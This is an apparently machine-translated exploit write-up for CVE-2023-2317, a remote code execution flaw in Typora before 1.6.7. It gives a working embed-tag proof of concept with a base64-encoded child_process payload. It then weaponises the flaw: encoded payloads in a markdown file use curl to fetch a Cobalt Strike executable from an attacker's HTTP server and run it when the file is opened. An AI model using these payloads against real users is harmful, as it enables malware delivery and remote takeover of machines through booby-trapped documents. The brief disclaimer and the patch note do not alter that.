Typora Remote Code Execution Vulnerability [CVE-2023-2317]
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Product introduction
Typora is an editor.
There is a security vulnerability in versions prior to Typora 1.6.7. The vulnerability comes from the fact that by loading typora://app/typemark/updater/update.html in the tag, JavaScript code can be loaded in the main window of Typora.
Two, the impact version
Typora < 1.6.7
3. Vulnerability recurrence
Test POC
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
The poc part is decoded as follows
double click the md file
popped a calculator
Many of the above blogs have been written here and stopped, right, the judge continues
4. In-depth reproduction
1. Start the teamserver service
2.cs generates exe file
3. Open http.server
4. Import combined boxing to md file
(1) Download the first command of Mazi, decrypt base64 and modify the path by yourself
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2N1cmwgLW8gIkU6XGFydGlmYWN0MjIuZXhlIiAiaHR0cDovLzE5Mi4xNjguMjMzLjE6ODc2NS9hcnRpZmFjdDIyLmV4ZSInLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
(2) Execute the second code of Ma Zi, pay attention, do not reverse the order of the two
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ3N0YXJ0IEU6XGFydGlmYWN0MjIuZXhlJywgTGludXg6ICdnbm9tZS1jYWxjdWxhdG9yIC1lICJUeXBvcmEgUkNFIFBvQyInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
(3) Double-click to execute the md file
5. CS goes online
5. Repair suggestions
At present, the manufacturer has released an upgrade patch to fix the vulnerability